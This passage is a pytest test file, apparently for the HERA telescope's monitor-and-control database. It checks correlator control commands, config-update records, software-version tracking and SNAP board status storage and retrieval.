    command_list = session.correlator_control_command(command, testing=True)
    assert len(command_list) == 1
    command_time = command_list[0].time
    assert Time.now().gps - command_time < 2.
    expected = corr.CorrelatorControlCommand.create(
        Time(command_time, format='gps'), command)
    assert command_list[0].isclose(expected)
    # test adding the command(s) to the database and retrieving them
    for cmd in command_list:
        session.add(cmd)
    result_list = session.get_correlator_control_command(
        starttime=Time.now() - TimeDelta(10, format='sec'),
        stoptime=Time.now() + TimeDelta(10, format='sec'), command=command)
    assert len(result_list) == 1
    assert command_list[0].isclose(result_list[0])
def test_take_data_command_no_recent_status(mcsession):
    """take_data issues a command plus an arguments object; non-standard
    acclen_spectra values warn but still work."""
    test_session = mcsession
    # test take_data command with no recent status
    starttime = Time.now() + TimeDelta(10, format='sec')
    command_list = test_session.correlator_control_command(
        'take_data', starttime=starttime, duration=100, tag='engineering',
        testing=True)
    # take_data produces two objects: the command and its arguments
    assert len(command_list) == 2
    command_time = command_list[0].time
    assert Time.now().gps - command_time < 2.
    command_time_obj = Time(command_time, format='gps')
    expected_comm = corr.CorrelatorControlCommand.create(command_time_obj,
                                                         'take_data')
    assert command_list[0].isclose(expected_comm)
    # integration time in seconds: spectra count * spectrum duration
    int_time = corr.DEFAULT_ACCLEN_SPECTRA * ((2.0 * 16384) / 500e6)
    expected_args = corr.CorrelatorTakeDataArguments.create(
        command_time_obj, starttime, 100, corr.DEFAULT_ACCLEN_SPECTRA,
        int_time, 'engineering')
    assert command_list[1].isclose(expected_args)
    # check warning with non-standard acclen_spectra
    command_list = checkWarnings(test_session.correlator_control_command,
                                 ['take_data'],
                                 {'starttime': starttime, 'duration': 100,
                                  'acclen_spectra': 2048, 'tag': 'engineering',
                                  'testing': True,
                                  'overwrite_take_data': True},
                                 message='Using a non-standard acclen_spectra')
    assert len(command_list) == 2
    command_time = command_list[0].time
    assert Time.now().gps - command_time < 2.
    command_time_obj = Time(command_time, format='gps')
    expected_comm = corr.CorrelatorControlCommand.create(command_time_obj,
                                                         'take_data')
    assert command_list[0].isclose(expected_comm)
    int_time = 2048 * ((2.0 * 16384) / 500e6)
    expected_args = corr.CorrelatorTakeDataArguments.create(
        command_time_obj, starttime, 100, 2048,
        int_time, 'engineering')
    assert command_list[1].isclose(expected_args)
@pytest.mark.parametrize(
    ("commands_to_test"),
    [list(set(corr.command_dict.keys())
          - {'take_data', 'update_config', 'restart', 'hard_stop'})])
def test_control_command_with_recent_status(mcsession, commands_to_test):
    """Commands are no-ops when the matching state is already set, and are
    issued when the opposite state is set."""
    session = mcsession
    # test things on & off with a recent status
    for command in commands_to_test:
        state_type = corr.command_state_map[command]['state_type']
        state = corr.command_state_map[command]['state']

        # matching recent state: the command should not be issued
        t1 = Time.now() - TimeDelta(30 + 60, format='sec')
        session.add_correlator_control_state(t1, state_type, state)
        command_list = session.correlator_control_command(
            command, testing=True)
        assert len(command_list) == 0

        # opposite (more recent) state: the command should be issued
        t2 = Time.now() - TimeDelta(30, format='sec')
        session.add_correlator_control_state(t2, state_type, not state)
        command_list = session.correlator_control_command(
            command, testing=True)
        assert len(command_list) == 1
        command_time = command_list[0].time
        assert Time.now().gps - command_time < 2.
        expected = corr.CorrelatorControlCommand.create(
            Time(command_time, format='gps'), command)
        assert command_list[0].isclose(expected)

        # discard the uncommitted states so the next command starts clean
        session.rollback()
        result = session.get_correlator_control_state(
            most_recent=True, state_type=state_type)
        assert len(result) == 0
def test_take_data_command_with_recent_status(mcsession):
    """Test the take_data command when a recent 'taking_data' state exists.

    Covers: error while already taking data, success once taking_data is
    False, error when a pending take_data command exists, and the
    overwrite_take_data escape hatch (which warns instead of erroring).
    """
    test_session = mcsession
    # test take_data command with recent status

    # correlator currently taking data -> commanding take_data is an error
    t1 = Time.now() - TimeDelta(60, format='sec')
    test_session.add_correlator_control_state(t1, 'taking_data', True)

    pytest.raises(RuntimeError, test_session.correlator_control_command,
                  'take_data',
                  starttime=Time.now() + TimeDelta(10, format='sec'),
                  duration=100, tag='engineering', testing=True)

    # more recent status says not taking data -> command succeeds
    t2 = Time.now() - TimeDelta(30, format='sec')
    test_session.add_correlator_control_state(t2, 'taking_data', False)

    t3 = Time.now() + TimeDelta(10, format='sec')
    control_command_objs = test_session.correlator_control_command(
        'take_data', starttime=t3, duration=100, tag='engineering',
        testing=True)
    for obj in control_command_objs:
        test_session.add(obj)
    test_session.commit()
    time.sleep(1)

    # a take_data command is now pending: a new one errors unless
    # overwrite_take_data is set, in which case it only warns
    starttime = Time.now() + TimeDelta(10, format='sec')
    pytest.raises(RuntimeError, test_session.correlator_control_command,
                  'take_data',
                  starttime=starttime + TimeDelta(30, format='sec'),
                  duration=100, tag='engineering', testing=True)

    command_list = checkWarnings(
        test_session.correlator_control_command, func_args=['take_data'],
        func_kwargs={'starttime': starttime, 'duration': 100,
                     'tag': 'engineering', 'testing': True,
                     'overwrite_take_data': True},
        message='Correlator was commanded to take data')
    command_time = command_list[0].time
    assert Time.now().gps - command_time < 2.

    command_time_obj = Time(command_time, format='gps')
    expected_comm = corr.CorrelatorControlCommand.create(
        command_time_obj, 'take_data')
    assert command_list[0].isclose(expected_comm)

    # expected integration time for the default acclen
    # (2 * 16384 samples per spectrum / 500e6 sample rate — per corr module
    # conventions; confirm against corr._get_integration_time)
    int_time = corr.DEFAULT_ACCLEN_SPECTRA * ((2.0 * 16384) / 500e6)
    expected_args = corr.CorrelatorTakeDataArguments.create(
        command_time_obj, starttime, 100, corr.DEFAULT_ACCLEN_SPECTRA,
        int_time, 'engineering')
    assert command_list[1].isclose(expected_args)

    # add to the database and retrieve by command time and by starttime
    for obj in command_list:
        test_session.add(obj)
    test_session.commit()
    result_args = test_session.get_correlator_take_data_arguments(
        most_recent=True, use_command_time=True)
    assert len(result_args) == 1
    assert result_args[0].isclose(expected_args)

    # querying by data starttime returns the earlier (t3) command's args,
    # which differ from the overwritten ones
    result_args = test_session.get_correlator_take_data_arguments(
        starttime=Time.now())
    assert len(result_args) == 1
    assert not result_args[0].isclose(expected_args)
@pytest.mark.parametrize(
    ("command", "kwargs"),
    [('foo', {}),
     ('take_data', {'starttime': Time.now() + TimeDelta(10, format='sec'),
                    'duration': 100}),
     ('take_data', {'starttime': Time.now() + TimeDelta(10, format='sec'),
                    'tag': 'engineering'}),
     ('take_data', {'duration': 100, 'tag': 'engineering'}),
     ('take_data', {'starttime': 'foo', 'duration': 100,
                    'tag': 'engineering'}),
     ('take_data', {'starttime': Time.now() + TimeDelta(10, format='sec'),
                    'duration': 100, 'tag': 'foo'}),
     ('take_data', {'starttime': Time.now() + TimeDelta(10, format='sec'),
                    'duration': 100, 'tag': 'foo', 'acclen_spectra': 2}),
     ('noise_diode_on',
      {'starttime': Time.now() + TimeDelta(10, format='sec')}),
     ('phase_switching_off', {'duration': 100}),
     ('restart', {'acclen_spectra': corr.DEFAULT_ACCLEN_SPECTRA}),
     ('noise_diode_off', {'tag': 'engineering'})])
def test_control_command_errors(mcsession, command, kwargs):
    """Unknown commands or bad/missing keyword arguments raise ValueError."""
    with pytest.raises(ValueError):
        mcsession.correlator_control_command(command, testing=True, **kwargs)
@pytest.mark.parametrize(
    ("command"), list(set(corr.command_dict.keys())
                      - {'take_data', 'update_config', 'stop_taking_data'}))
def test_control_command_errors_taking_data(mcsession, command):
    """Most commands must raise RuntimeError while data is being taken."""
    # record a recent 'taking_data' state one minute in the past
    recent = Time.now() - TimeDelta(60, format='sec')
    mcsession.add_correlator_control_state(recent, 'taking_data', True)
    with pytest.raises(RuntimeError):
        mcsession.correlator_control_command(command, testing=True)
def test_control_command_errors_other():
    """Creating command/argument objects with a bad time raises ValueError."""
    with pytest.raises(ValueError):
        corr.CorrelatorControlCommand.create('foo', 'take_data')
    obs_start = Time('2016-01-10 01:15:23', scale='utc')
    with pytest.raises(ValueError):
        corr.CorrelatorTakeDataArguments.create(
            'foo', obs_start, 100, 2, 2 * ((2.0 * 16384) / 500e6),
            'engineering')
@requires_redis
def test_get_integration_time():
    """The integration time computed from a spectra count is positive."""
    assert corr._get_integration_time(147456) > 0
@requires_redis
def test_get_next_start_time():
    # smoke test: only verifies the redis-backed query does not raise
    corr._get_next_start_time()
def test_corr_config_command_no_recent_config(mcsession, corr_config):
    """Test an update_config command with no recent config status on record."""
    test_session = mcsession
    # test commanding a config with no recent config status
    t1 = Time.now()
    with open(corr_config[0], 'r') as fh:
        config_string = fh.read().encode('utf-8')
    config_hash = hashlib.md5(config_string).hexdigest()

    # with no prior config, three objects are produced:
    # a config-file record, a control command and a config command
    command_list = test_session.correlator_control_command(
        'update_config', config_file=corr_config[0], testing=True)
    assert len(command_list) == 3

    # test adding the config obj(s) to the database and retrieving them
    for obj in command_list:
        test_session.add(obj)
    test_session.commit()

    file_expected = corr.CorrelatorConfigFile(
        config_hash=config_hash, filename=corr_config[0])
    assert command_list[0].isclose(file_expected)
    file_result = test_session.get_correlator_config_file(config_hash=config_hash)
    assert len(file_result) == 1
    file_result = file_result[0]
    assert file_result.isclose(file_expected)

    # command is timestamped "now" (within a couple of seconds)
    command_time = command_list[1].time
    assert Time.now().gps - command_time < 2.

    command_time_obj = Time(command_time, format='gps')
    expected_comm = corr.CorrelatorControlCommand.create(
        command_time_obj, 'update_config')
    assert command_list[1].isclose(expected_comm)

    config_comm_expected = corr.CorrelatorConfigCommand.create(
        command_time_obj, config_hash)
    assert command_list[2].isclose(config_comm_expected)

    config_comm_result = test_session.get_correlator_config_command(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(config_comm_result) == 1
    config_comm_result = config_comm_result[0]
    assert config_comm_result.isclose(config_comm_expected)
def test_corr_config_command_with_recent_config(mcsession, corr_config, corr_config_dict):
    """Test an update_config command when a different config was recently active.

    The commanded config's hash differs from the recent status, so a
    config-file record, a control command and a config command are all
    produced (three objects).
    """
    test_session = mcsession
    # test commanding a config with a recent (different) config status
    corr_config_list = test_session.add_correlator_config_from_corrcm(
        config_state_dict=corr_config_dict, testing=True)
    for obj in corr_config_list:
        test_session.add(obj)
    test_session.commit()

    t1 = Time.now()
    with open(corr_config[0], 'r') as fh:
        config_string = fh.read().encode('utf-8')
    config_hash = hashlib.md5(config_string).hexdigest()

    command_list = test_session.correlator_control_command(
        'update_config', config_file=corr_config[0], testing=True)
    assert len(command_list) == 3

    # test adding the config obj(s) to the database and retrieving them
    for obj in command_list:
        test_session.add(obj)
    test_session.commit()

    file_expected = corr.CorrelatorConfigFile(
        config_hash=config_hash, filename=corr_config[0])
    assert command_list[0].isclose(file_expected)
    file_result = test_session.get_correlator_config_file(config_hash=config_hash)
    assert len(file_result) == 1
    file_result = file_result[0]
    assert file_result.isclose(file_expected)

    # command is timestamped "now" (within a couple of seconds)
    command_time = command_list[1].time
    assert Time.now().gps - command_time < 2.

    command_time_obj = Time(command_time, format='gps')
    expected_comm = corr.CorrelatorControlCommand.create(
        command_time_obj, 'update_config')
    assert command_list[1].isclose(expected_comm)

    # NOTE: a duplicated copy of the command-time assertion that appeared
    # here (copy-paste artifact) was removed; it repeated the check above.
    config_comm_expected = corr.CorrelatorConfigCommand.create(
        command_time_obj, config_hash)
    assert command_list[2].isclose(config_comm_expected)

    config_comm_result = test_session.get_correlator_config_command(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(config_comm_result) == 1
    config_comm_result = config_comm_result[0]
    assert config_comm_result.isclose(config_comm_expected)
def test_corr_config_command_with_recent_config_match_prior(mcsession,
                                                            corr_config,
                                                            corr_config_dict):
    """Test an update_config command when a matching config exists in history.

    The file record already exists from a prior matching config, so only
    two objects are produced (control command + config command).
    """
    test_session = mcsession
    # test commanding a config with a recent (different) config status but a
    # matching prior one
    t1 = Time.now()
    t0 = Time(1512760942, format='unix')
    with open(corr_config[0], 'r') as fh:
        config_string = fh.read().encode('utf-8')
    config_hash = hashlib.md5(config_string).hexdigest()

    # put in a previous matching config
    matching_corr_config_dict = {'time': t0, 'hash': config_hash,
                                 'config': corr_config[1]}
    corr_config_list = test_session.add_correlator_config_from_corrcm(
        config_state_dict=matching_corr_config_dict, testing=True)
    for obj in corr_config_list:
        test_session.add(obj)
    test_session.commit()

    # the stored filename is derived from the config's gps time
    config_filename = 'correlator_config_' + str(int(floor(t0.gps))) + '.yaml'
    file_expected = corr.CorrelatorConfigFile(config_hash=config_hash,
                                              filename=config_filename)
    file_result = test_session.get_correlator_config_file(config_hash=config_hash)
    assert len(file_result) == 1
    file_result = file_result[0]
    assert file_result.isclose(file_expected)

    # make more recent one that doesn't match
    corr_config_list = test_session.add_correlator_config_from_corrcm(
        config_state_dict=corr_config_dict, testing=True)
    for obj in corr_config_list:
        test_session.add(obj)
    test_session.commit()

    # only two objects: the file record already exists
    command_list = test_session.correlator_control_command(
        'update_config', config_file=corr_config[0], testing=True)
    assert len(command_list) == 2

    # test adding the config obj(s) to the database and retrieving them
    for obj in command_list:
        test_session.add(obj)
    test_session.commit()

    command_time = command_list[0].time
    assert Time.now().gps - command_time < 2.
    command_time_obj = Time(command_time, format='gps')
    expected_comm = corr.CorrelatorControlCommand.create(
        command_time_obj, 'update_config')
    assert command_list[0].isclose(expected_comm)

    config_comm_expected = corr.CorrelatorConfigCommand.create(
        command_time_obj, config_hash)
    assert command_list[1].isclose(config_comm_expected)

    config_comm_result = test_session.get_correlator_config_command(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(config_comm_result) == 1
    config_comm_result = config_comm_result[0]
    assert config_comm_result.isclose(config_comm_expected)
def test_corr_config_command_same_recent_config(mcsession, corr_config):
    """Commanding a config identical to the current one yields no commands."""
    test_session = mcsession
    # test commanding a config with the same recent config status
    t0 = Time(1512760942, format='unix')
    with open(corr_config[0], 'r') as fh:
        config_string = fh.read().encode('utf-8')
    config_hash = hashlib.md5(config_string).hexdigest()

    # put in a previous matching config
    matching_corr_config_dict = {'time': t0, 'hash': config_hash,
                                 'config': corr_config[1]}
    corr_config_list = test_session.add_correlator_config_from_corrcm(
        config_state_dict=matching_corr_config_dict, testing=True)
    for obj in corr_config_list:
        test_session.add(obj)
    test_session.commit()

    # the stored filename is derived from the config's gps time
    config_filename = 'correlator_config_' + str(int(floor(t0.gps))) + '.yaml'
    file_expected = corr.CorrelatorConfigFile(config_hash=config_hash,
                                              filename=config_filename)
    file_result = test_session.get_correlator_config_file(config_hash=config_hash)
    assert len(file_result) == 1
    file_result = file_result[0]
    assert file_result.isclose(file_expected)

    # same hash as the current status -> nothing to command
    command_list = test_session.correlator_control_command(
        'update_config', config_file=corr_config[0], testing=True)
    assert len(command_list) == 0
def test_config_command_errors(mcsession, corr_config):
    """Bad config-command argument combinations raise ValueError."""
    # bad time input to the config command constructor
    with pytest.raises(ValueError):
        corr.CorrelatorConfigCommand.create('foo', 'testhash')
    # not setting config_file with 'update_config' command
    with pytest.raises(ValueError):
        mcsession.correlator_control_command('update_config', testing=True)
    # setting config_file with other commands
    with pytest.raises(ValueError):
        mcsession.correlator_control_command(
            'restart', config_file=corr_config[0], testing=True)
    data_start = Time.now() + TimeDelta(10, format='sec')
    with pytest.raises(ValueError):
        mcsession.correlator_control_command(
            'take_data', starttime=data_start, duration=100,
            tag='engineering', config_file=corr_config[0], testing=True)
def test_add_correlator_software_versions(mcsession):
    """Test adding and retrieving correlator software version records."""
    test_session = mcsession
    t1 = Time('2016-01-10 01:15:23', scale='utc')

    test_session.add_correlator_software_versions(
        t1, 'hera_corr_f', '0.0.1-3c7fdaf6')
    expected = corr.CorrelatorSoftwareVersions(
        time=int(floor(t1.gps)), package='hera_corr_f',
        version='0.0.1-3c7fdaf6')
    result = test_session.get_correlator_software_versions(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    # add a second package; filtering by package still returns one row each
    test_session.add_correlator_software_versions(
        t1, 'hera_corr_cm', '0.0.1-11a573c9')
    result = test_session.get_correlator_software_versions(
        starttime=t1 - TimeDelta(3.0, format='sec'), package='hera_corr_f')
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_correlator_software_versions(
        package='hera_corr_f')
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    expected = corr.CorrelatorSoftwareVersions(
        time=int(floor(t1.gps)), package='hera_corr_cm',
        version='0.0.1-11a573c9')
    result = test_session.get_correlator_software_versions(
        starttime=t1 - TimeDelta(3.0, format='sec'),
        package='hera_corr_cm')
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_correlator_software_versions(
        package='hera_corr_cm')
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    # time-window query returns both packages' rows
    result = test_session.get_correlator_software_versions(
        starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t1)
    assert len(result) == 2

    result_most_recent = test_session.get_correlator_software_versions()
    # BUGFIX: this previously asserted on `result` (already known to be 2
    # from the query above), leaving the no-argument most-recent query
    # completely unverified.
    assert len(result_most_recent) == 2

    # a start time after all records returns an empty list
    result = test_session.get_correlator_software_versions(
        starttime=t1 + TimeDelta(200.0, format='sec'))
    assert result == []
def test_software_version_errors(mcsession):
    """A non-Time timestamp raises ValueError."""
    with pytest.raises(ValueError):
        mcsession.add_correlator_software_versions(
            'foo', 'hera_corr_cm', '0.0.1-11a573c9')
def test_add_snap_config_version(mcsession, feng_config, init_args):
    """Test adding and retrieving SNAP config version records."""
    test_session = mcsession
    t1 = Time('2016-01-10 01:15:23', scale='utc')
    t2 = t1 + TimeDelta(120.0, format='sec')

    # add a config file + status first (the version references the hash)
    test_session.add_correlator_config_file('testhash', feng_config[0])
    test_session.commit()
    test_session.add_correlator_config_status(t1, 'testhash')
    test_session.commit()

    test_session.add_snap_config_version(
        t1, '0.0.1-3c7fdaf6', init_args, 'testhash')
    expected = corr.SNAPConfigVersion(
        init_time=int(floor(t1.gps)), version='0.0.1-3c7fdaf6',
        init_args=init_args, config_hash='testhash')
    result = test_session.get_snap_config_version(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    # add a second, later version with a different config hash
    test_session.add_correlator_config_file('testhash2', feng_config[0])
    test_session.commit()
    test_session.add_correlator_config_status(t2, 'testhash2')
    test_session.commit()

    test_session.add_snap_config_version(
        t2, '0.0.1-11a573c9', init_args, 'testhash2')
    expected = corr.SNAPConfigVersion(
        init_time=int(floor(t2.gps)), version='0.0.1-11a573c9',
        init_args=init_args, config_hash='testhash2')
    result = test_session.get_snap_config_version(
        starttime=t2 - TimeDelta(3.0, format='sec'))
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    # most recent returns only the later version
    result_most_recent = test_session.get_snap_config_version()
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    # time-window query returns both versions
    result = test_session.get_snap_config_version(
        starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t2)
    assert len(result) == 2

    # a start time after all records returns an empty list
    result = test_session.get_snap_config_version(
        starttime=t1 + TimeDelta(200.0, format='sec'))
    assert result == []
def test_snap_config_version_errors(mcsession, init_args):
    """A non-Time init time raises ValueError."""
    with pytest.raises(ValueError):
        mcsession.add_snap_config_version(
            'foo', '0.0.1-3c7fdaf6', init_args, 'testhash')
def test_add_corr_snap_versions_from_corrcm(mcsession, snapversion, init_args):
    """Test adding software & snap config versions from a corrcm-style dict.

    Also verifies that re-reporting the same hera_corr_cm version at a new
    timestamp does not create a new row, while a new version string does.
    """
    test_session = mcsession
    # use testing to prevent call to hera_librarian to save new config file
    corr_snap_version_obj_list = \
        test_session.add_corr_snap_versions_from_corrcm(
            corr_snap_version_dict=snapversion, testing=True)
    for obj in corr_snap_version_obj_list:
        test_session.add(obj)
    test_session.commit()

    # software-version rows (times match the fixture dict's timestamps)
    t1 = Time(datetime.datetime(2019, 4, 2, 19, 7, 14), format='datetime')
    result = test_session.get_correlator_software_versions(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    expected = corr.CorrelatorSoftwareVersions(
        time=int(floor(t1.gps)),
        package='hera_corr_f:hera_snap_redis_monitor.py',
        version='0.0.1-3c7fdaf6')
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_correlator_software_versions(
        package='hera_corr_f:hera_snap_redis_monitor.py')
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    # most recent across all packages: three packages expected
    result_most_recent = test_session.get_correlator_software_versions()
    assert len(result_most_recent) == 3
    most_recent_packages = sorted(res.package for res in result_most_recent)
    expected_recent_packages = sorted(['udpSender:hera_node_keep_alive.py',
                                       'udpSender:hera_node_cmd_check.py',
                                       'hera_corr_cm'])
    assert most_recent_packages == expected_recent_packages

    result = test_session.get_correlator_software_versions(
        starttime=t1 - TimeDelta(3.0, format='sec'),
        stoptime=t1 + TimeDelta(10.0, format='sec'))
    assert len(result) == 5

    # snap config version row
    t2 = Time(datetime.datetime(2019, 3, 27, 8, 28, 25), format='datetime')
    result = test_session.get_snap_config_version(
        starttime=t2 - TimeDelta(3.0, format='sec'))
    expected = corr.SNAPConfigVersion(init_time=int(floor(t2.gps)),
                                      version='0.0.1-3c7fdaf6',
                                      init_args=init_args,
                                      config_hash='testhash')
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_snap_config_version()
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    # config status row associated with the snap config
    t3 = Time(datetime.datetime(2019, 2, 18, 5, 41, 29), format='datetime')
    result = test_session.get_correlator_config_status(
        starttime=t3 - TimeDelta(3.0, format='sec'))
    expected = corr.CorrelatorConfigStatus(time=int(floor(t3.gps)),
                                           config_hash='testhash')
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_correlator_config_status()
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    # test that a new hera_corr_cm timestamp with the same version doesn't make
    # a new row
    new_dict = copy.deepcopy(snapversion)
    new_dict['hera_corr_cm']['timestamp'] = (
        datetime.datetime(2019, 4, 2, 19, 8, 17, 644984))
    corr_snap_version_obj_list = \
        test_session.add_corr_snap_versions_from_corrcm(
            corr_snap_version_dict=new_dict)
    t4 = Time(datetime.datetime(2019, 4, 2, 19, 7, 17), format='datetime')
    t5 = Time(datetime.datetime(2019, 4, 2, 19, 8, 17), format='datetime')
    expected = corr.CorrelatorSoftwareVersions(
        time=int(floor(t4.gps)), package='hera_corr_cm',
        version='0.0.1-11a573c9')
    result = test_session.get_correlator_software_versions(
        starttime=t4 - TimeDelta(3.0, format='sec'),
        stoptime=t5 + TimeDelta(10.0, format='sec'),
        package='hera_corr_cm')
    assert len(result) == 1
    assert result[0].isclose(expected)

    # test that a new hera_corr_cm timestamp with a new version makes a new row
    new_dict = copy.deepcopy(snapversion)
    new_dict['hera_corr_cm']['timestamp'] = (
        datetime.datetime(2019, 4, 2, 19, 8, 17, 644984))
    new_dict['hera_corr_cm']['version'] = '0.0.1-b43b2b72'
    corr_snap_version_obj_list = \
        test_session.add_corr_snap_versions_from_corrcm(
            corr_snap_version_dict=new_dict)
    expected = corr.CorrelatorSoftwareVersions(
        time=int(floor(t5.gps)), package='hera_corr_cm',
        version='0.0.1-b43b2b72')
    result = test_session.get_correlator_software_versions(
        starttime=t4 - TimeDelta(3.0, format='sec'),
        stoptime=t5 + TimeDelta(10.0, format='sec'),
        package='hera_corr_cm')
    assert len(result) == 2
    assert result[1].isclose(expected)
@onsite
def test_onsite_add_corr_snap_versions_from_corrcm(mcsession):
    """On-site smoke test: pull live version info from the correlator."""
    # this has to be done onsite, not in CI because it needs to talk to the librarian
    # as well (to register the config file in the librarian)
    test_session = mcsession
    test_session.add_corr_snap_versions_from_corrcm()
    result = test_session.get_correlator_software_versions(
        package='hera_corr_cm', most_recent=True)
    assert len(result) == 1
    result = test_session.get_correlator_software_versions()
    assert len(result) >= 1
    result = test_session.get_snap_config_version()
    assert len(result) == 1
def test_add_snap_status(mcsession):
    """Test adding and retrieving SNAP status records."""
    test_session = mcsession
    t1 = Time('2016-01-10 01:15:23', scale='utc')
    t_prog = Time('2016-01-05 20:00:00', scale='utc')

    test_session.add_snap_status(t1, 'heraNode700Snap0', 'SNPA000700',
                                 False, 595687, 57.984954833984375,
                                 595686, t_prog)
    expected = corr.SNAPStatus(time=int(floor(t1.gps)),
                               hostname='heraNode700Snap0',
                               serial_number='SNPA000700', node=700,
                               snap_loc_num=0,
                               psu_alert=False, pps_count=595687,
                               fpga_temp=57.984954833984375,
                               uptime_cycles=595686,
                               last_programmed_time=int(floor(t_prog.gps)))
    result = test_session.get_snap_status(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    # add a second snap on another node; node filtering keeps them separate
    test_session.add_snap_status(t1, 'heraNode701Snap3', 'SNPD000703',
                                 True, 595699, 59.323028564453125,
                                 595699, t_prog)
    result = test_session.get_snap_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), nodeID=700)
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_snap_status(nodeID=700)
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    expected = corr.SNAPStatus(time=int(floor(t1.gps)),
                               hostname='heraNode701Snap3',
                               serial_number='SNPD000703', node=701,
                               snap_loc_num=3,
                               psu_alert=True, pps_count=595699,
                               fpga_temp=59.323028564453125,
                               uptime_cycles=595699,
                               last_programmed_time=int(floor(t_prog.gps)))
    result = test_session.get_snap_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), nodeID=701)
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_snap_status(nodeID=701)
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    # time-window query returns both snaps
    result = test_session.get_snap_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t1)
    assert len(result) == 2

    result_most_recent = test_session.get_snap_status()
    # BUGFIX: previously asserted on `result` (already checked just above),
    # so the no-argument most-recent query was never actually verified.
    # Both snaps share the same time t1, so most-recent returns both.
    assert len(result_most_recent) == 2

    # a start time after all records returns an empty list
    result = test_session.get_snap_status(
        starttime=t1 + TimeDelta(200.0, format='sec'))
    assert result == []
def test_add_snap_status_from_corrcm(mcsession, snapstatus):
    """Test adding SNAP status records from a corrcm-style dict."""
    test_session = mcsession
    test_session.add_snap_status_from_corrcm(
        snap_status_dict=snapstatus)
    # times match the fixture dict's timestamps
    t1 = Time(datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
              format='datetime')
    t_prog = Time(datetime.datetime(2016, 1, 10, 23, 16, 3), format='datetime')

    # node 700 snap
    result = test_session.get_snap_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), nodeID=700)
    expected = corr.SNAPStatus(time=int(floor(t1.gps)),
                               hostname='heraNode700Snap0',
                               serial_number='SNPA000700', node=700,
                               snap_loc_num=0,
                               psu_alert=False, pps_count=595687,
                               fpga_temp=57.984954833984375,
                               uptime_cycles=595686,
                               last_programmed_time=int(floor(t_prog.gps)))
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_snap_status(nodeID=700)
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    # node 701 snap
    result = test_session.get_snap_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), nodeID=701)
    expected = corr.SNAPStatus(time=int(floor(t1.gps)),
                               hostname='heraNode701Snap3',
                               serial_number='SNPD000703', node=701,
                               snap_loc_num=3,
                               psu_alert=False, pps_count=595699,
                               fpga_temp=59.323028564453125,
                               uptime_cycles=595699,
                               last_programmed_time=int(floor(t_prog.gps)))
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    # most recent with no node filter returns both snaps
    result_most_recent = test_session.get_snap_status()
    assert len(result_most_recent) == 2
def test_add_snap_status_from_corrcm_with_nones(mcsession, snapstatus_none):
    """SNAP status entries containing None values round-trip correctly."""
    status_objs = mcsession.add_snap_status_from_corrcm(
        snap_status_dict=snapstatus_none, testing=True)
    for status_obj in status_objs:
        mcsession.add(status_obj)

    status_time = Time(datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
                       format='datetime')
    # every optional field should come back as None
    expected = corr.SNAPStatus(time=int(floor(status_time.gps)),
                               hostname='heraNode700Snap0',
                               serial_number=None, node=None,
                               snap_loc_num=None,
                               psu_alert=None, pps_count=None,
                               fpga_temp=None, uptime_cycles=None,
                               last_programmed_time=None)
    result = mcsession.get_snap_status(
        starttime=status_time - TimeDelta(3.0, format='sec'))
    assert len(result) == 1
    assert result[0].isclose(expected)
def test_snap_status_errors(mcsession):
    """Non-Time status or programmed times raise ValueError."""
    good_time = Time('2016-01-10 01:15:23', scale='utc')
    # bad status time
    with pytest.raises(ValueError):
        mcsession.add_snap_status('foo', 'heraNode700Snap0', 'SNPA000700',
                                  False, 595687, 57.984954833984375, 595686,
                                  good_time)
    # bad last-programmed time
    with pytest.raises(ValueError):
        mcsession.add_snap_status(good_time, 'heraNode700Snap0', 'SNPA000700',
                                  False, 595687, 57.984954833984375, 595686,
                                  'foo')
def test_get_node_snap_from_serial_nodossier(mcsession):
    """An unknown snap serial warns and yields (None, None)."""
    expected_warning = (
        "No active connections returned for snap serial foo. "
        "Setting node and snap location numbers to None"
    )
    with pytest.warns(UserWarning, match=expected_warning):
